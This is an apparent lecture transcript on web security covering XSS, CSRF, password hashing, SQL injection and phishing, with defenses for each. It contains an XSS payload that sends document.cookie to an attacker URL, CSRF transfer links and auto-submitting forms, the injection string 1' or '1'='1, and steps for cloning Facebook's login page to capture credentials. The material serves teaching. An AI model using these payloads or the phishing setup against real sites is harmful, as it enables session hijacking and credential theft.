You may have also seen a few changes in your browser, especially recently. This screenshot shows a couple of changes that are designed to warn you when you are not using HTTPS encryption. And it's not necessary to use HTTPS for every interaction you have on the internet. For example, if you are going to a site that is purely informational, just static content, just a list of information, there's no login, there's no buying, there's no clicking on things that might then get tracked, it's not really necessary to use HTTPS. So don't necessarily be alarmed if you visit a site and you're warned that it's not secure. We're told that over time this warning will turn red and become perhaps even more prominent, as newer browser versions come out and as more and more sites adopt HTTPS. But you're going to start getting notifications. And you may have seen these in green as well: if you are using HTTPS and you log into something, you'll see a little lock icon here, and you'll be told that the connection is secure. And again, this is because human beings tend not to be as concerned as they should be about their digital privacy and security when using the internet. And now the technology is trying to provide clues and tips to entice you to be more concerned about these things.

Now let's take a look at a couple of attacks that are derived from things we typically consider to be advantages of using the internet. The first of these is the idea of cross-site scripting, XSS.
We've previously discussed the distinction between server-side code and client-side code. Client-side code, recall, is something that runs locally on our computer, where our browser, for example, is expected to interpret and execute that code. Server-side code is run on the server. And when we get information from a server, we're not getting back the actual lines of code. We're getting back the output of that code having run in the first place. So for example, there might be some code on the server, some Python code or PHP code, that generates HTML for us. The actual Python or PHP code in this example would be server-side code. We don't ever see that code. We only see its output.

A cross-site scripting vulnerability exists when an adversary is able to trick a client's browser into running something locally, something that presumably the person, the client, didn't actually intend to run. Let's take a look at an example of this using a very simple web framework called Flask. We have here some Python code. And don't be too worried if this doesn't all make sense to you. It's just a pretty short, simple web server that does two things. There's some bookkeeping stuff here from Flask, which is a Python package that is used to create web servers. But this web server does two things. The first is when I visit slash on my web server. So let's say this is Doug's site. If I go to dougspage.com, then slash, which you may not actually explicitly type anymore because most browsers just add it, just means the root page of the server. I'm going to call the following function, whose name happens to be index in this case: return hello world. And what this basically means is that if I visit dougspage.com/, what I receive is an HTML page whose content is just hello world. So it's just an HTML file that says hello world. Again, this code here is all server-side code. You don't actually see this code. You only see the output of this code, which is this here, this HTML. It's just a simple string in this case, but it would be interpreted by the browser as HTML. If, however, I get a 404, which is a not found error, it means the page I requested doesn't exist. And since I've only defined the behavior for literally one page, slash, the index page of my server, then for anything else I want to call this function, not found: return not found plus whatever page I tried to visit. So it's basically another very simple page, much like hello world here, except that instead of saying hello world, it says not found, and then it also concatenates onto the very end of that whatever page I tried to visit.
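The code being described looks along these lines; this is a minimal reconstruction of the sort of Flask server being shown, with hypothetical wording for the strings.

```python
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def index():
    return "hello, world"

@app.errorhandler(404)
def not_found(e):
    # Vulnerable: the requested path is echoed straight back into the HTML.
    return "Not found: " + request.path, 404
```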
This is a major cross-site scripting vulnerability. And let's see why. Let's imagine I go to /foo, so dougspage.com/foo. Recall that our error handler function will return not found /foo. Seems pretty reasonable. It seems like the behavior I expected or intended. But what about if I go to a page like this one? This is what I literally type in the browser: dougspage.com/, then angle bracket, script, angle bracket, alert('hi'), and then a closing script tag. This script tag looks a lot like HTML. And in fact, when the browser sees this, it will interpret it as HTML. And so what I get returned by visiting this page is not found, and then everything here except for the leading slash, which means that when I receive this and my client is interpreting the HTML, I'm going to generate an alert. What is an alert? Well, if you've ever gone to a website and had a pop-up box display some information, where you have to click OK or click X to make it go away, that's what an alert is. So by visiting this page on my website, I've actually tricked my browser into giving me a JavaScript alert, or I've tricked the browser of whoever visits this page into giving them a JavaScript alert. So that's probably not exactly a good thing.

But it can get a little more nefarious than that. Instead of having this be on my server, it might be easier to imagine it like this: this script tag here is what I wrote into my Facebook profile, for example. Facebook gives you the ability to write a short little bio about yourself. Let's imagine that my bio was this: script, document.write, image source, and then a hacker URL and everything. And imagine that I own that hacker URL, and I wrote this in my Facebook profile. Assuming that Facebook did not defend against cross-site scripting attacks, which they do, but assuming that they did not, anytime somebody visited my profile, their browser would be forced to contend with this script tag here. Why? Because they're trying to visit my profile page. My profile page contains literally these characters, which are going to be interpreted as HTML. And it's going to execute document.write, which is a JavaScript way of saying add the following in addition to the HTML of the page: image source equals hacker URL ?cookie= and then document.cookie.

So imagine that I, again, control the hacker URL. Presumably, as somebody who is running a website, I also maintain logs of every time somebody tries to access my website and what page on my site they're trying to visit. If somebody goes to my Facebook profile and executes this, I'm going to get notified via my hacker URL logs that somebody has tried to go to that page: ?cookie= and then document.cookie. Now, document.cookie in this case, because this exists on my Facebook profile, is that individual's cookie for Facebook. So here's what I am doing. Again, Facebook does defend against cross-site scripting attacks, so this can't actually happen on Facebook. But assuming that they did not defend against them adequately, I'm basically getting told via my log that somebody tried to visit some page on my URL, and into the page that they tried to visit I'm plugging in, and basically stealing, the cookie that they use for Facebook. And a cookie, recall, is sort of like a hand stamp. Instead of having to re-log into Facebook every time I want to use it, it's basically me going up to Facebook and saying, here, you've already verified my identity, just take a look at this, and I get let in. And now I hypothetically know someone else's Facebook cookie. And if I were clever, I could try to change my Facebook cookie to that person's Facebook cookie. And then suddenly I'm able to log in, view their profile, and act as them. This image tag here is just a clever trick, because the idea is that it's trying to pull some resource from my site that doesn't exist. I don't have a list of all the cookies on Facebook. But I'm being told that somebody is trying to access this URL on my site. So the image tag is just a trick to force the browser to log something on my hacker URL. The idea is that I would be able to steal somebody's Facebook cookie, were this attack not well defended against.
So what techniques can we use, either for our own sites that we are running, to avoid cross-site scripting vulnerabilities, or to protect against them? The first technique that we can use is to sanitize, so to speak, all of the inputs that come in to our page. Let's take a look at how exactly we might do this. It turns out that there are things called HTML entities, which are other ways of representing certain characters in HTML that might be considered special or control characters, characters like the left angle bracket and the right angle bracket. Typically, when a browser sees a left angle bracket or right angle bracket character, it's going to automatically interpret that as some HTML that it should then process. So in the example I just showed a moment ago, I was using the fact that whenever the browser sees angle brackets with script between them, it's going to try to interpret whatever is between those tags as a script. One way for me to prevent that from being interpreted as a script is to call those characters something other than just left angle bracket and right angle bracket. And these HTML entities can be used to refer to those characters instead. So if I sanitize my input in such a way that every time somebody literally typed the character left angle bracket, I had written some code that automatically changed it into &lt;, and every time somebody wrote a greater-than character, or right angle bracket, I changed that into &gt;, then when my page was responsible for processing or interpreting something, it wouldn't interpret those as HTML. It would still display the characters, a left angle bracket or less-than sign (that's what the lt stands for) or a right angle bracket or greater-than sign (that's what the gt stands for). It would literally just show those characters and not treat them as HTML. So that's the idea of what it means to sanitize input when we're talking about HTML entities, for example.

Another thing that we could do is just disable JavaScript entirely. This has some upsides and some downsides. The upside is that you're pretty well protected against cross-site scripting vulnerabilities, because they're usually going to be introduced via JavaScript. The downside is that JavaScript is pretty convenient. It's nice. It makes for a better user experience. Sometimes there might be parts of our page that just don't work if JavaScript is completely disabled, so there are trade-offs there. You're protecting yourself, but you might be degrading the experience in other ways. Or we could decide to handle the JavaScript in a special way. So for example, we might not allow what's called inline JavaScript, like the script tags that I just showed a moment ago, but we might allow JavaScript written in separate files, which can also be linked into your HTML pages. Those would be allowed, but inline JavaScript, like what we just saw, would not be. We could sandbox the JavaScript, running it separately somewhere else first to see if it does something weird, and if it doesn't, then allow it to run. We could also employ a content security policy. A content security policy is another header that we can add to our HTTP responses, and with it we can define behavior that will allow certain types of JavaScript through but not others.
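In Python, that first defense, converting special characters into their HTML entities, is available out of the box, as in this minimal sketch using the standard library's html module.

```python
import html

# A user-supplied bio containing a script tag, like the attack above.
bio = "<script>alert('hi')</script>"

print(html.escape(bio))
# &lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;
# The browser now displays these characters instead of executing a script.
```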
Now, there's another type of attack that relies heavily on the fact that we use cookies so extensively, and that is a cross-site request forgery, or CSRF. Now, cross-site scripting attacks generally involve receiving some content and the client's browser being tricked into doing something locally that it didn't want to do. In a CSRF attack, the trick is that we're relying on the fact that there is a cookie that can be exploited to make an outbound HTTP request that we did not intend to make. And again, this relies extensively on cookies, because they are this shorthand, short-form way to log into something. And we can make a fraudulent request appear legitimate if we can rely on someone's cookie. Now, again, if you ever use a cloud service, for example, it's going to have CSRF defenses built in. This is really a concern if you're building a simple site and you don't defend against it yourself. Flask, for example, does not defend against this particularly well, but Flask is a very simple web framework; server frameworks are generally going to be much more complicated than that and have much more additional functionality, to be more feature-full. So let's walk through what these cross-site request forgeries might look like. For context, let's imagine that I send you an email asking you to click on some URL. So you're going to click on this link, and it's going to redirect you to some page. Maybe that page looks something like this. It's pretty simple-- not much going on here. I have a body, and inside of it I have one more link. And the link is http://hackbank.com/transfer?to=doug&amt=500. Now, perhaps you don't hover over it to see where the link actually goes. But maybe you are a customer of Hack Bank. And maybe I know that you're a customer of Hack Bank, such that if you click on this link, and if you happen to be logged in, and if you happen to have your cookie set for hackbank.com, and this was the way that they actually executed transfers-- by having you go to /transfer and say to whom you want to send money and in what amount... Now, fortunately, most banks don't actually do this. Usually, if you're going to do something that manipulates the database, as this would-- because it's going to be transferring some amount of money somewhere-- that would be via an HTTP POST request; this is just a straightforward GET request I'm making here. If you were logged in to Hack Bank, though, or if your cookie for Hack Bank was set, and you clicked on this link, hypothetically a transfer of $500-- again, assuming that this was how you did it, you specified a person and you specified an amount-- would be made from your account to, presumably, my account. That's probably not something you intended to do. So that would be an example of a cross-site request forgery. It's a legitimate request. It appears that you intended to do this, because it came from you. It's using your cookie. But you didn't actually intend for it to happen. Here's another example. You click on the link in my email and you get brought to this page. So there's not even a second link to click anymore. Now it's just trying to load an image. Now, looking at this URL, we can tell there's not an image there. It doesn't end in .jpg or .png or the like. It's the same URL as before. But my browser sees image source equals something and says, well, I'm at least going to try to go to that URL and see if there is an image there to load for you.
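Sketched as markup, the two pages described might contain something like the following; hackbank.com is the lecture's hypothetical bank, and the parameter names to and amt are a guess at the slide's intent:

    # The link variant: the victim must click, but the request carries
    # their hackbank.com cookie, so it looks legitimate to the bank.
    link_version = (
        '<a href="http://hackbank.com/transfer?to=doug&amt=500">Click here!</a>'
    )

    # The image variant: no click needed. The browser requests the URL
    # automatically while trying to load the "image", cookie and all.
    image_version = '<img src="http://hackbank.com/transfer?to=doug&amt=500">'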
Again, you just click on the link in the email. This page loads. Your browser tries to go to this page to load the image there. But in so doing, it's, again, executing this unintended transfer, relying on your cookie at hackbank.com. Another example of this might be a form. So again, it appears that you click on the link in the email. You get brought to a form that now just has a button at the bottom of it that says Click Here. And the reason it just shows a button, even though there's other stuff written, is that those first two fields are hidden. They are type equals hidden, which means you wouldn't actually see them when the page loads in your browser. Now, contrast this, for example, with a field whose type is text, which you might see if you're doing a straightforward login. You would type characters in and see the actual characters appear. That's text, versus a password field, where you would type characters in and see all stars. It would visually obscure what you typed. The action of this form-- that is, where the form goes, what happens when you click on the Submit button at the bottom-- is the same as before. It's hackbank.com/transfer. And then I'm using these parameters here: to Doug, the amount of $500, Click Here. Notice I actually am now using a POST request to try to initiate this transfer-- again, assuming that this was how Hack Bank structured transfer requests. So if you clicked here, and this was otherwise validly structured, and you were logged in, or your cookie was valid for Hack Bank, then this would initiate a transfer of $500. And I can play another trick, similar to what I did a moment ago with the image, by doing something like this: when the page is loaded, instantly submit this form. So you don't even have to click anymore. It's just going to go through the document-- document being JavaScript's way of referring to the entire web page-- find the first form, forms[0], assuming this is the first form on the page, and just submit it. Doesn't matter what else is going on. Just submit this form. That would also initiate the transfer if you clicked on that link from my email. So a quick summary of these two different types of attacks. In a cross-site scripting attack, the adversary tricks you into executing code on your browser to do something locally that you probably did not intend. And a cross-site request forgery is something that appears to be a legitimate request from your browser, because it's relying on cookies-- you're ostensibly logged in in that way-- but you don't actually mean to make that request. Now let's talk about a couple of vulnerabilities that exist in the context of a database, which I know you've discussed recently as well. So imagine that I have a table of users in my database that looks like this: each of them has an ID number, a username, and a password. Now, the obvious vulnerability here is that I really shouldn't be storing my users' passwords like this, in the clear. If somebody were ever to hack in and get a hold of this database file, that's really, really bad. I am not following best practices to protect my customers' information. So I want to avoid doing that. So instead what I might do, as we've discussed, is hash their passwords-- run them through some hash function-- so that when they're actually stored, they get stored looking something like this. You have no idea what the original password was. And because it's a hash, it's irreversible.
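As a quick sketch of what that hashed storage might look like-- using SHA-256 from Python's standard library, though the lecture doesn't say which hash function its example uses:

    import hashlib

    # Hash a few of the passwords from the example; note the
    # repeated entry at the end.
    for pw in ["12345", "abcdef", "password", "password"]:
        digest = hashlib.sha256(pw.encode()).hexdigest()
        print(f"{pw:>10} -> {digest[:16]}...")
    # The two "password" rows print identical digests: an unsalted hash
    # is deterministic, so the same input always yields the same output.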
You should not be able to undo what I did when I ran it through the hash function. But there's actually still a vulnerability here. And the vulnerability here is not technical-- it's human, again. The vulnerability that exists here follows from the fact that we're using a hash function, which is deterministic: when we pass some data through it, we're going to get the same output every time we pass that data through it. And two of our users, Charlie and Eric, have the same hash. And this makes sense, because if we go back a moment, they also had the same actual password when it was stored in plain text. We've gone out of our way to try to defend against that by hashing it. But somebody who gets a hold of this database file-- for example, they hack into it, they get it-- they'll see two people have the same password. And maybe this is a very small subset of my user base. Maybe there are hundreds of thousands of people, and maybe 10% of them all have the same hash. Well, again, human beings-- we are not the best at defending our own stuff. It's a sad truth that the most common password is password, followed by some of these other examples we had a second ago. All of these are pretty bad passwords. They're all on the list of the most commonly used passwords across all services, which means that if an adversary sees the same hash many, many times in our database, it doesn't matter that we have taken steps to protect our users. A clever adversary might think, well, I'm seeing this hash 10% of the time, so I'm going to guess that Charlie's password for the service is 12345-- and they're wrong. And then they'll maybe try abcdef, and they're wrong. And then maybe they try password, and they're right. And then all of a sudden, every time they see that hash, they can assume that the password is password for every single one of those users. So again, there's nothing we can do as technologists to solve this problem. This is really just getting folks to understand that using different, non-standard passwords is really important. That's why we talked about password managers, and maybe not even knowing your own passwords, in a prior lecture. There's another problem that can exist with databases, though, in particular when we see screens like this. So this is a contrived login screen that has username and password fields and a Forgot Password checkbox, whose purpose in life is: if you type in your email address-- which is the username in this case-- and you have the Forgot Password box checked, and you click Login, instead of actually logging you in, it's going to email you, hopefully, a link to change your password-- not your actual password, for reasons we previously discussed as well. But what if, when we click on this button, we see this: OK, we've emailed you a link to change your password. Does that seem inherently problematic? Perhaps not. But what about if somebody might see this instead: sorry, no user with that email address. Does that perhaps seem problematic when you compare it against the first message? This is an example of something called information leakage. Perhaps an adversary has hacked some other database where folks were not being as secure with credentials, and so they have a whole set of email addresses mapped to credentials.
And because human beings tend to reuse the same credentials across multiple different services, they try other services that they believe these users might also use, using those same username and password combinations. If this is the way that we field these types of forgot-password inquiries, we're potentially revealing some information. If Alice is a user, we're now saying, yes, Alice is a user of this service-- go ahead and try this password. If the adversary gets the other message, they might not bother trying. They've realized, oh, Alice is not a user of this service. And even if they're not trying to hack into it, if we respond like this, we're also telling that adversary quite a bit about Alice. Now we know Alice uses this service, and this service, and this service, and not this one. And they can sort of create a picture of who Alice might be. They're using her digital footprint to understand more about her. A better response in this case might be to say something like this: request received. If you're in our system, you'll receive an email with instructions shortly. That's not tipping our hand either way as to whether the user is in the database or not. No information leakage here, and generally a better way to protect our customers' privacy. Now, that's not the only problem that we can have with databases. We've alluded to this idea of SQL injection. And there's this comic that makes the rounds quite a bit when we talk about SQL injection, from a web comic called XKCD, that involves a SQL injection attack-- which is basically providing some text or some query to a database where that input actually does something unintended. It is itself SQL, as opposed to just being some parameter that gets plugged in-- like, what is your name, and then we search the database for that name. Instead of giving you my name, I might give you something that is actually a SQL query, which is going to be executed even though you don't want me to execute it. So let's see an example of how this might work. Here's another simple username and password field. And in this example, I've intentionally written my password field poorly for purposes of the example, so that it will actually show you the text that is typed, as opposed to showing you stars like a password field should. So this is what the user sees when they access my site. And perhaps on the back end, in the server-side code, inside of Python somewhere, I have written a SQL query that looks like the following: when the login button is clicked, execute the following SQL query. SELECT star from users where username equals uname-- uname here in yellow referring to whatever was typed in the username box-- and password equals pword-- where, again, pword refers to whatever was typed in the password box. So we're doing a SQL query to select star from users-- get all of the information from the users table-- where the username equals whatever they typed in that box and the password equals whatever they typed in the other box. And so, for example, if I have somebody who logs in with the username Alice and the password 12345, what the query would actually look like with these values plugged in might be something like this: SELECT star from users where username equals Alice and password equals 12345. If there is nobody with username Alice, or Alice's password is not 12345, then this will fail. Both of those conditions need to be true. But what about this?
Someone whose username is hacker, and their password is 1' or '1' equals '1. That looks pretty weird. And the reason it looks pretty weird is because this is an attempt to inject SQL-- to trick SQL into doing something that is presumably not intended by the code that we wrote. Now, it probably helps to plug the data in and see what exactly this is going to do. SELECT star from users where username equals hacker and password equals '1' or, and so on and so on. Maybe I do have a person whose username actually is hacker, but that's probably not their password. That doesn't matter. I'm still going to be able to log in if I have somebody whose username is hacker. And the reason for that is this or. I have sort of short-circuited the end of the SQL query. There's a quote mark that demarcates the end of what the user presumably typed in, but I've literally typed one of those into my password to trick SQL. So if hacker's password equals 1-- if it just happens to literally be the character 1-- OK, I have succeeded. I guess that's a really bad password, and I shouldn't be able to log in that way, but maybe that is the case and I'm able to log in. But even if not, this other thing is true: '1' does equal '1'. So as long as somebody whose username is hacker exists in the database, I am now able to log in as hacker, because this is true. The first part's probably not true, right? It's unlikely that their password is 1. But regardless of what their password is, the second part actually is true. It's a very simple SQL injection attack. I'm basically logging in as someone I'm presumably not supposed to be able to log in as, but it illustrates the kind of thing that could happen: you are allowing people to bypass logins. Now, it could get worse if your database administrator username is admin or something very common-- the default for this is typically admin. This would potentially give people the ability to become database administrators, in that they're able to execute exactly this kind of trick on the admin user. Now they have administrative access to your database, which means they can do things like manipulate the data in the database-- change things, add things, delete things that you don't want to have deleted. And in the case of a database, deletion is pretty permanent. You can't undo a delete in a database most of the time, the way you might be able to with other files. Now, are there techniques to avoid this kind of attack? Fortunately, there are. Right now I'd like to just take a look at a very simple Python program that replicates the kind of thing one could do in a more robust, more complex SQL situation. So let's pull up a program where we're just simulating this idea of a SQL injection, to show you that it's not that difficult to defend against. So let's pull up the code here in this file, login.py. There's not that much going on here. I have x equals input username. So x, recall, is a Python variable. And input username is basically going to prompt the user with the string username and then expect them to type something after that. And then we do exactly the same thing with password, except storing the result in y. So whatever the user types after username will get stored in x. Whatever they type after password will get stored in y. And then here I'm just going to print. And in the SQL context, this would be the query that actually gets executed. So imagine that that's what's happening instead.
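The transcript doesn't show the file itself, but from the description, login.py presumably looks something like this:

    # login.py -- a reconstruction based on the walkthrough above.
    x = input("Username: ")  # whatever the user types is stored in x
    y = input("Password: ")  # and the password in y

    # In a real application, this string would be handed to the database;
    # here we just print the query that would be executed.
    print(f"SELECT * FROM users WHERE username = '{x}' AND password = '{y}'")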
SELECT star from users where username equals, and then this placeholder here, {x}. What I'm doing here is just using a Python formatted string-- that's what this f at the beginning means; it's not a typo. I'm going to plug in whatever the user typed at the first prompt, which I stored in x, and whatever the user typed at the second prompt, which is stored in y. So let's actually just run this program. Let's pop open a terminal here for a second. The name of this program is login.py, so I'm going to type python login.py, Enter. Username, Doug. Password, 12345. And then the query, hypothetically, that would get executed if I constructed it in this way is SELECT star from users where username equals Doug and password equals 12345. Seems reasonable. But if I try to do the adversarial thing that I did a moment ago-- username equals Doug, password equals 1' or '1' equals '1, with no final single quote-- and I hit Enter, then I end up with SELECT star from users where username equals Doug and password equals 1 or 1 equals 1. And the latter part of that is true. The former part is false. But it's good enough that I would be able to log in if I did something like that. So we want to try to get around that. Now let's take a look at a second file that might solve this problem. I'm going to open up login2.py in my editor here. It starts out exactly the same-- x equals something, y equals something-- but I'm making a pretty basic substitution. I'm replacing every single quote that I see with a double quote. And I have to preface the single quote with a backslash. Because notice, I'm actually using single quotes in the code to identify the character I'm trying to substitute, and the thing I'm trying to substitute is itself a single quote. So I need to put a backslash in front of it to escape that character, such that it actually gets treated as a single quotation mark character-- Python's not going to try to interpret it in some other, special way. So I want to replace every instance of a single quote in x with a double quote, and I want to replace every instance of a single quote in y with a double quote. Now, why do I want to do that? Because notice, in my actual Python string here, I'm using single quotes to set off the variables for purposes of SQL's interpretation of them. So where the username equals this string-- I'm using single quotes to do that. So if my username or my password also contained single quotation mark characters, when SQL was interpreting the query, it might think that the next single quote character it sees is the end-- I'm done with what was typed. And that's exactly how I tricked it in the previous example. I used that first single quote, which seemed kind of random and out of nowhere, to trick SQL into thinking, I'm done with this. Then I used the keyword or-- back now in SQL itself, and not in some string that I'm searching for-- and then I continued the trick from there. So this is designed to eliminate all the single quotes, because single quotes mean something very special in the context of my SQL query itself. If you're actually using SQL libraries that are tied into Python, the ability to replace things is much more robust than this example. But even this very simple example, where I'm doing just this very basic substitution, is good enough to get around the injection attack that we just looked at.
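Again reconstructing from the description, login2.py presumably looks something like this:

    # login2.py -- identical, except single quotes in the input are
    # swapped for double quotes before the query string is built.
    x = input("Username: ")
    y = input("Password: ")

    # The backslash escapes the single quote inside the string literal.
    x = x.replace('\'', '"')
    y = y.replace('\'', '"')

    print(f"SELECT * FROM users WHERE username = '{x}' AND password = '{y}'")

And the more robust approach the lecture alludes to is a parameterized query-- with Python's sqlite3 module, for instance, cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (x, y)) lets the library handle the escaping itself.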
So this is now in login2.py. Let's do this: python login2.py. And we'll start out the same way. We'll do Doug and 12345. And it appears that nothing has changed. The behavior is otherwise identical, because I'm not trying any tricks like that. SELECT star from users where username equals Doug and password equals 12345. But if I now try that same trick that I did a moment ago-- so the password is 1' or '1' equals '1-- and I hit Enter, now I'm not subject to that same SQL injection anymore, because I'm trying to select all the information from the users table where the username is Doug and the password equals-- and notice that here is the first single quote, and here is the second one. So SQL thinks that entire thing is now the password. Only if my password were literally 1" or "1" equals "1 would I actually be logging in. If that happened to be my password, this would work. But otherwise, I've escaped it. I've stopped the adversary from being able to leverage a simple trick like this to break into my database when they're not intended to do so. And again, in actual SQL injection defense, the substitutions that we make are much more complicated than this. We're not just looking for single quote characters and double quote characters; we're considering semicolons or any other special characters that SQL would interpret as part of a statement. We can escape those out so that users could literally use single quotes or semicolons or the like in their passwords without compromising the integrity of the entire database. So we've taken a look at several of the most common, most obvious ways that an adversary might be able to extract information, either from a business or an individual. And these ways are kind of attention-getting in some contexts. But let's now bring things full circle to something I've mentioned many times, which is that humans are the core fatal flaw in all of these security matters we're dealing with here. And let's do that by talking about phishing-- what phishing is. So phishing is just an attempt by an adversary to prey upon us and our unfortunate general ignorance of basic security protocols. It's an attempt to socially engineer information out of someone, basically. You pretend to be someone that you are not. And if you do so convincingly enough, you might be able to extract information from that person. Now, you'll also see phishing in other contexts-- computer scientists like to be clever with their wordplay. You'll see things like netting, which is basically a phishing attack launched against many people at once, hoping to get one or two. There's spear phishing, which is a phishing attack that targets one specific person, trying to get information from them. And then there's whaling, which is a phishing attack targeted against somebody who is perceived to have a lot of information, or whose information is particularly valuable, such that you'd be phishing for some big whale. Now, one of the most obvious and easy types of phishing attack looks like this. It's a simple URL substitution. This is how we can write a link in HTML. A is the HTML tag for anchor, which we use for hyperlinks. Href is where we are going to. And then we also have the ability to specify some text at the end of that. These two items do not have to match, as you can see here. I can say we're going to URL2 but actually send you to URL1.
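In markup, the mismatch being described is simply this-- url1.example and url2.example are placeholders standing in for the lecture's URL1 and URL2:

    # The href (where the browser actually goes) and the link text
    # (what the reader sees) are completely independent of each other.
    deceptive_link = '<a href="https://url1.example">https://url2.example</a>'
    print(deceptive_link)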
This is an incredibly common way to get information from somebody. They think they're going one place, but they're actually going someplace else. And to show you, as a very basic example, just how easy it is to potentially trick somebody into going somewhere they're not supposed to-- and potentially then revealing credentials as well-- let's just take a simple example here with Facebook. Why don't we take a moment to build our own version of Facebook and see if we can't get somebody to reveal information to us? So let's imagine that I have acquired some domain name that's really similar to facebook.com-- it's off by one character, a common typo. For example, maybe people mistype the A or something like that, in a way that would not necessarily be obvious to somebody at the outset. One way that I might take advantage of somebody's thinking they're logging into Facebook is to make a page that looks exactly the same as Facebook. That's actually not very difficult to do. All you have to do is open up Facebook here. And because its HTML is available to me, I can right click on it, View Page Source-- it takes a second to load here; Facebook is a pretty big site-- and then I can just control-A to select all of the content, copy it, and paste it into my index.html, and we will save. And then we'll head back into our terminal, and I will start Chrome on the file index.html, which is the file that I literally just saved my Facebook information in. So: start chrome index.html. You'll notice that it brings me to this URL here, which is the path to where this file currently lives. And this page looks like Facebook, except for the fact that, when I log in, I get redirected back to something that actually is Facebook and is not something that I control. But at the outset, my page here looks identical to Facebook. Now, the trick would be to do something so that when the user provides information here in the email box and here in the password field and clicks Login, I might be able to get that information from them. Maybe I'm just waiting to capture their information. So the next step for me might be to go back into my random set of stuff here. There's a lot of random code that we don't really care about. But the one thing I do care about is what happens when somebody clicks on this Login button. That is interesting to me. So I'm going to go through this and do control-F-- control-F just being find-- for the string login. That's the text that's literally written on the button, so hopefully I'll find it somewhere. I'm told I have eight results. So this first one-- if I just kind of look around for context to try to figure out where I am in the code-- is the title of something, so that's probably not it. I don't want to go there. Create an account or log in-- not quite what I'm looking for. So go to the next one. OK, here we go: input value equals login. So now I've found an input that is called login. This is presumably a button that's presumably part of some form. So if I scroll up a little bit higher, hopefully I will find a form, which I do-- form ID. And it has an action. The action is to go to this particular page, facebook.com/login/ and so on and so on. But maybe I want to send it somewhere else. So if I replace this entire URL with where I actually want to send the user-- where maybe I'm going to capture their information-- maybe I'll store this in login.html.
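The edit being described amounts to something like the following-- the form's original attributes are abbreviated here, since the real Facebook markup is long and changes over time:

    # Before (roughly): <form id="..." action="https://www.facebook.com/login/..." ...>
    # After: point the form's action at a page the attacker controls instead.
    modified_form = '<form action="login.html" method="post">'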
And so that's what's going to come in here. And then we'll save the file so that our changes have been captured. So presumably what should happen now is, when you click on the Login button in my fake Facebook, you instead get redirected to login.html, rather than to Facebook's actual login, as we saw just a moment ago. So let's try again. We'll go back here to our fake Facebook page. We will refresh so that we get our new content-- remember, we just changed the HTML content, so we actually need to reload it so that our browser has it. And we'll type in abc@cs50.net and then some password here and click Login, and we get redirected here: sorry, we are unable to log you in at this time. But notice we're still in a file that I created. I didn't show you login.html, but that's exactly what I put there. Now, I'm not actually going to phish for information here. Even though I'm using fake data, I'm not going to do something that would arguably violate the terms of service, or get myself in trouble, by actually attempting to do some phishing. But imagine that instead of some HTML, I had some Python code that was able to read the data from those fields. We saw that a moment ago with passwords, right? We know the possibility exists that, if the user types something into a field, we have the ability to extract it. What I could do here is very simple. I could just read those two fields where they typed a username and a password, but then display this content. Perhaps it's been the case that you've gone to some website and seen, oh, yeah, sorry, the server can't handle this request right now, or something along those lines. And you maybe think nothing of it. Or maybe I even have a link here that says, try again. And if you click Try Again, it brings you back to Facebook's actual login, where you would then enter your credentials, try again, and perhaps think everything was fine. But if on this login page I had extracted your username and password by tricking you into thinking you were logging into Facebook-- and then maybe I save those in some file somewhere and then just display this error to you-- you think, ah, they just had an error. Things are a little bit busy. I'll try again. And when you try again, it works. It's really that easy. And the way to avoid phishing expeditions, so to speak, is just to be mindful of what you're doing. Take a look at the URL bar to make sure that you're on the page that you think you're on. Hopefully you've come away now with a bit more of an understanding of cybersecurity and some of the best practices that are put in place to deal with potential cybersecurity threats. Now it's incumbent upon us to use the technology we have available to help protect ourselves from ourselves-- and not only ourselves and our own data, but our clients and their data as well.